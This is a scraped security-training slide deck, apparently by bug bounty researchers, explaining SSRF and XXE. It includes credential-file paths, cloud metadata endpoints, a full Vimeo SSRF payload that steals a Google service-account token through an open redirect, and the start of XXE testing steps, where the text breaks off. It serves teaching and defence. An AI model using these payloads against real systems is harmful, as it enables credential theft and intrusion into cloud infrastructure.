Sourceful

Discover the best public
Google docs

Find docs created by community members like you. Give feedback, collaborate and create your own.
  1. Home
  2. Google Slide
  3. Demystifying the Server Side

Demystifying the Server Side

A presentation explaining a lot of concepts related to software development of the back end - API calls, URL components, servers, etc.

programming, back-end, learning

Demystifying the Server Side

Complex terminologies simplified

@iamnoooob

@rootxharsh

@h4ckologic

Meet the team

Application Security Engineer

Security Engineer

Software Security Researcher

Harsh Jaiswal

Rahul Maini

Rajanish Pathak

Let’s look at the definition of URL according to the RFC 3986.

Scheme:

HTTP

File

Example HTTP URLs:

http://:/

http://:@/path1/path2

http://:@/path?q1=a&q2=b

http://:@/path?q1=a&q2=b#URL Fragment

Example FILE URLs:

file:///etc/passwd

file:///home/user/.ssh/id_rsa

file:///c:/WINDOWS/win.ini

URL - Uniform Resource Locator

SSRF, Making the cloud rain

AGENDA

Introduction to SSRF

SSRF identification & Impact

SSRF attack Scenarios

SSRF case studies

SSRF – WHAT IS IT?

Server-side request forgery is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization's infrastructure, or to external third-party systems.

A Simple SSRF vulnerable snippet.

A Vulnerable Ruby snippet – Here the application accepts the user input through the url parameter and the open() call fetches the Url specified and returns the response body to the client.

A Vulnerable PHP snippet – The user trusted input ie: URL is passed via GET method, and the server fetches the content and displays it.

Can you spot other issue here?

A Simple SSRF

The attacker forces the application to make an HTTP request back to the server that is hosting the application.

Supplying a URL with a host like 127.0.0.1 or localhost.

The server will fetch the contents of the /sensitivefilepath and return it to the user.

URL comes from the local machine itself & the normal access controls are bypassed

Fetching the contents on localhost

Types of SSRF

Full response SSRF: an attacker is able to fetch the full response of an internal/external resource(File, HTTP Response etc.) with an HTTP request made on behalf of the server

Blind SSRF: In case of blind SSRF, request is made but no response is returned to the attacker. To discover which networks are routed internally or identify internal services, try looking at the time difference in responses.

SSRF and Cloud Metadata – Make Credentials Rain

AWS

http://169.254.169.254/metadata/v1/*

Google Cloud

http://metadata.google.internal/computeMetadata/v1/*

DigitalOcean

http://169.254.169.254/metadata/v1/*

Docker

http://127.0.0.1:2375/v1.24/containers/json

Kubernetes ETCD

http://127.0.0.1:2379/v2/keys/?recursive=true

Alibaba Cloud

http://100.100.100.200/latest/meta-data/*

Microsoft Azure

http://169.254.169.254/metadata/v1/*

If an attacker is able to determine the underlying cloud infrastructure he will easily be able to grab the AccessKeyId, SecretAccessKeys, private address, hostname, public keys, subnet ids, and more from the API.

Pulling the IAM role secret keys will give him API access to that AWS account and control over the infrastructure.

SSRF

CASE STUDIES

AND LABS

Case Study

SSRF

Vimeo API Playground

Vimeo provides their developers an easy to test and play around their Rest API. For such purposes, Vimeo provides an API console at https://developers.vimeo.com/.

The purpose of this console is to make it simpler to test API endpoints as such all you’d need to do it

Select an API Endpoint

Add required path/query/post parameters

Click Submit.

Behind the scenes

Example request

Select an endpoint /users/{user_id} to fetch 12345 user’s information.

- method set to GET - uri parameter set to /users/{user_id} - segments set to {“user_id”:”12345”} So backend will supposedly make a request to https://api.vimeo.com/users/12345 and will parse the JSON response and echo it back to the client/developer.

Abusing the feature

So it seems like we have control over the API endpoint to make request to via the parameter `uri`. However changing it to anything other than specified path resulted in a 403.

Abusing the feature… Hmmm what now?

However we do have another input in API endpoint path via the segments parameter in the Rest API. Segments value act as placeholder to be used in the `uri` parameter

What if we use {“uri”:”/users/{user_id}”,“segments”:{“user_id”:”../”}} ;)

This should make a request to https://api.vimeo.com/users/../ and if there’s no URL encoding on segments input, This path on normalization by HTTP library will make request to https://api.vimeo.com/

And.. Response from the root of the API.

But but we’re still on api.vimeo.com host

Make open redirects great again!

The plan is to find an open redirect and as I already figured this was following redirects, we could simply redirect to an internal host like cloud (Google) metadata API.

Good old content discovery

A bit of content discovery and I come across a limited redirect on https://api.vimeo.com/ which could make redirect to https://vimeo.com/ with my controlled path & query parameters. And 2 years on hacking, I already had saved plenty of open redirects at vimeo.com ;). https://api.vimeo.com/m/anything?foo=bar => https://vimeo.com/anything?foo=bar

Hitting others hosts

{..,"method":"method":"GET","uri":"/users/{user_id}","segments":"{\"user_id\":\"../../m/path/to/open/redirect?url=https://rce.ee/attacker.json\"}",...}

Final Payload to steal service account token from Google Metadata API

{"method":"GET","uri":"/users/{user_id}","segments":"{\"user_id\":\"../../m/path/to/open/redirect?url=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json\"}"} Response:

{"headers": [ "HTTP/1.1 200", "Content-Type: application/json", "Host: api.vimeo.com" ], "code": 200, "body”: { "access_token": "ya29.c.EmKeBq9XXDWtXXXXXXXXecIkeR0dFkGT0rJSA", "expires_in": 2631, "token_type": "Bearer" } }

STOP REPORTING OPEN REDIRECTS FOR $100!!

Case study SSRF Bypass

Integration feature observations

Application allowed to integrate WooCommerce store via its URL

Request was sent from server side with prefixed path

Only HTTPS hosts allowed

Request’s response was reflected back regardless of integration success

Potential fully responsive SSRF

Can’t hit AWS/GCP Metadata, works on plain HTTP.

If we could find an internal host working on HTTPS

Internally resolving hostnames were not allowed as well. Possible blacklist?

Find HTTPS hosts those don’t point to internal IP’s but are accessible for employees only. Sounds familiar? VPN only access hosts?

Let the recon begin

Subdomain enumeration

Found corp.company.com, *corp* Interesting, brute it.

Multiple hosts resolving to either internal IP’s or external IP’s but none were reachable.

This is exactly what we’re looking for!

Spots jenkins.corp.company.com pointing to external IP but not reachable.

Why target Jenkins of all the hosts.

Cause jenkins continuously works with prod server so probably in same VPC.

Makes sense to use SSL here.

Generally critical part of Infra - reaching it would show good impact.

Key takeaways

Blacklists can always be bypassed

VPN only hosts should be in your mind when testing for SSRF

Network segregation is your best bet

Exploring the File System - XXE

AGENDA

XML & XXE Basics

Ways To Exploit XXE:

InBand/Response Based XXE

Out-of-Band XXE

Problems With The Existing Techniques

Using Local DTDs To Read Filesystem

XML – EXTENSIBLE MARKUP LANGUAGE

Self-descriptive well structured document

Stores and transport information and is used as a dataset

Schema of the elements is defined inside “DOCTYPE” element

XML parsers are used to fetch values out of the elements

EXAMPLE XML

XML Declaration - defines charset, language etc.

Document Type Definition (DTD) – defines

Schema (Elements, Attributes, Data Types etc.)

of the XML Document

Actual XML Body

EXAMPLE XML (WITH EXTERNAL DTD)

XML Declaration - defines charset, language etc.

Externally hosted

Document Type Definition(DTD)

Actual XML Body

XML ENTITIES

Simply put Entities act like variables (way of representing data)

Can denote special markup, such as the <(<) and >(>) tags

Reducing the code in DTD by bundling declarations into entities

Entities have “SYSTEM” keyword as well(External Entities)

Types of XML Entities:

BUILT-IN

GENERAL

PARAMETER

TYPES OF ENTITIES

General Entities

Syntax:

]>

Can be summoned by &entity_name; only inside XML Body

Parameter Entities

Syntax:

]>

Can be summoned by %entity_name; even inside the DOCTYPE definition as well as inside other entities (Nested Entities)

General Entities Parameter Entities

TYPES OF ENTITIES

XXE - XML EXternal Entity

Cheatsheet for XXE: https://securityidiots.com/Web-Pentest/XXE/XXE-Cheat-Sheet-by-SecurityIdiots.html

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's XML parser.

XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and XML parsers support these features even if they are not normally used by the application.

An attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks or an arbitrary file read.

TYPICAL XML REQUEST

TESTING FOR XXE

Initially try replacing text node with general entities in the XML body and check if response is still the same which confirms entities are substituted.

Construct an XML request with a SYSTEM/PUBLIC entity keyword pointing to Burp Collaborator URL & check for the hits

If the request body is accepting J

Demystifying the Server Side
Info
Tags Programming, Back-end, Learning
Type Google Slide
Published 25/11/2020, 08:56:00

Resources

AWS Serverless Cost Calculator